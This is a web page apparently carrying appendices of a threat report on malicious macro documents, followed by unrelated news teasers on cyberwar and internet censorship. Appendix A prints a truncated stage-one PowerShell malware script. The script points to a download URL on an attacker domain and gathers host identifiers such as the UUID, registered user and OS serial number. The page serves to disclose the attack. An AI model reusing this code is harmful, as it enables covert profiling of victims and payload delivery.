Keep Calm and (Don’t) Enable Macros: Appendices

Appendices

See our original report here.

Appendix A: Stage One PowerShell Command

try {
    $path = "%temp%"
    $url = "http://adhostingcache.com/ehhe/eh4g4/adcache.txt"
    $extension = "ps1"
    $guid = (get-wmiobject win32_computersystemproduct).UUID
    $tmp = get-wmiobject win32_operatingsystem
    $osinfo = "{"
    $osinfo = $osinfo + '"systemdirectory":"'+$tmp.systemdirectory+'",'
    $osinfo = $osinfo + '"buildnumber":"'+$tmp.buildnumber+'",'
    $osinfo = $osinfo + '"registereduser":"'+$tmp.registereduser+'",'
    $osinfo = $osinfo + '"serialnumber":"'+$tmp.serialnumber+'",'
    $osinfo […]

Appendix B: Samples


Appendix A: List of Servers

We redact the last octet of the 186 IP addresses below that matched any of our fingerprints since 1 February 2014. […]

War From Cyberspace by Richard Clarke

ON OCTOBER 1, just beyond the Beltway inside Fort Meade, a four-star general became the first head of America’s new Cyber Command. Subordinate to General Keith Alexander are the Tenth Fleet and the Twenty-Fourth Air Force. The fleet has no ships, and the air-force unit has neither aircraft nor missiles. Their weapons are ones and […]

News of Iran’s Detained ‘Blogfather’

After a long silence, there is suddenly news on the fate of Hossein Derakhshan, an influential Iranian blogger with Canadian citizenship who was detained in Tehran almost a year ago. From The New York Times

How we used the internet to tell the story of the internet

Our interactive people’s history of the internet brings together your stories, alongside our own research and video interviews with key figures. From The Guardian

President Obama on Cyber Security Awareness

President Obama this week issued a short video address discussing the importance of cyber security awareness. The three-minute clip offers little in the way of startling revelation or news. But it is probably the most the president has had to say publicly about the topic since May, when he delivered a 16-minute speech saying he […]

More Tibetans arrested in connection with Internet activities

Reporters Without Borders calls for the release of three young Tibetans from the village of Dara who have been held in Nagchu county since 1 October, when they were arrested in nearby Sogdzong county for allegedly sending information about Tibet to contacts abroad via the Internet. From Reporters Without Borders

Russia considers new Internet filtering technology

According to this article published on a Russian news-site Inbox.ru, Russia has moved one inch closer to the China-style system of filtering the Web. Russia’s Ministry of Communications has urged ISPs to start filtering “negative” Internet content in places that provide public access to the Internet (think cafes, libraries, etc). Such filters have already been […]

Internet Companies to Limit Government Censorship

The South Korean government is considering more ways to impose rules on Internet users, but some companies operating Web sites are resisting the heavy-handedness. From The Korea Times